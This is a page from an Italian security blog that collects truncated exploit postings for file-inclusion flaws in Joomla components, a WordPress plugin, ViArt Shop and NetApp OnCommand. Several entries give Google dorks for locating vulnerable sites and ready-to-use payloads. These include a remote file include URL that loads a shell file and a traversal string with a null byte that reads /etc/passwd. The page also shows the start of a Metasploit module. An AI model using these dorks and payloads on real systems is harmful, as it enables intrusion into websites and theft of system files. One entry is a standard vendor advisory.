17 maggio 2013 - Fonte: http://www.mondounix.com
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
------------------------- -------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All...
Leggi il seguito »
Inserito in 0day, component, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, X-SHOP
9 maggio 2013 - Fonte: http://www.mondounix.com
SEC Consult Vulnerability Lab Security Advisory < 20130507-0 >
=======================================================================
title: Multiple vulnerabilities
product: NetApp OnCommand System Manager
vulnerable version: <= 2.1 and <=2.0.2
fixed version: 2.2 (only XSS fixed)
CVE: CVE-2013-3320 (XSS)
CVE-2013-3321 (File inclusion)
CVE-2013-3322 (OS command execution)
impact: medium
homepage: http://www.netapp.com/
found: 2012-11-06
by: M. Heinzl
SEC Consult Vulnerability Lab
https://www.sec-consult.com/
=======================================================================
Vendor...
Leggi il seguito »
Inserito in 0day, COMMAND EXECUTION, cross site scripting, exploit, FILE INCLUSION, linux, MondoUnix, NETAPP ONCOMMAND, PHP, proof of concept, remote, Security, Sicurezza, system manager, unix, Vulnerabilities, Vulnerability, webapps, XSS
3 gennaio 2013 - Fonte: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
'Description' => %q{
This module exploits a remote file inclusion flaw in the WordPress blogging
software...
Leggi il seguito »
Inserito in 0day, ADVANCED CUSTOM FIELDS, exploit, FILE INCLUSION, linux, metasploit, MondoUnix, PHP, Plugin, Plugins, remote, REMOTE FILE INCLUSIONE, script, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, WORDPRESS SECURITY, WP-CONTENT
20 dicembre 2012 - Fonte: http://www.mondounix.com
[!]===========================================================================[!]
[~] Joomla Component ztautolink LFI Vulnerability
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : www.zootemplate.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_ztautolink" ;)
[+] Version : N/A
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1//index.php?option=com_ztautolink&controller=[r0b0t]
[...
Leggi il seguito »
Inserito in 0day, component, COM_ZTAUTOLINK, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, ZTAUTOLINK
20 dicembre 2012 - Fonte: http://www.mondounix.com
[!]===========================================================================[!]
[~] Joomla Component bit LFI Vulnerability
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : JomLand.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_bit " ;)
[+] Version : N/A
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1//index.php?option=com_bit&controller=[r0b0t]
[ Code PHP...
Leggi il seguito »
Inserito in 0day, bit, component, COM_BIT, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps
26 settembre 2012 - Fonte: http://www.mondounix.com
############################################
### Exploit Title: ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability
### Date: 26/9/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.viart.com/
### Software Link: http://www.viart.com/downloads/viart_shop-4.1.zip
### Version: 4.1
### Tested on: Linux/Windows
############################################
# Affected files :
1- ( /admin/admin_header.php ) on line 13 :
include_once($root_folder_path . "messages/" . $language_code . "/cart_messages.php");
2- ( /includes/ajax_list_tree.php ) on line 29 :
include_once($root_folder_path...
Leggi il seguito »
Inserito in 0day, exploit, FILE INCLUSION, fli, linux, MondoUnix, PHP, remote, Security, Sicurezza, unix, VIART SHOP EVALUATION, Vulnerabilities, Vulnerability, webapps
20 luglio 2012 - Fonte: http://www.mondounix.com
#################################################################################
# Title : Joomla Component com_hello Local File Include
#
# Author : Ajax Security Team
#
# Discovered By : devilzc0der & Dominator
#
# Dork : inurl:"com_hello"
#
# h0m3 : www.ajaxtm.com
#
# Software Link : www.joomla.com
#
# Level : High
##################################################################################
# p0c :
# com_hello&controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypas .
##################################################################################
# 3xample :
#
http://SITE/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
###################################################################################
#...
Leggi il seguito »
Inserito in 0day, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps
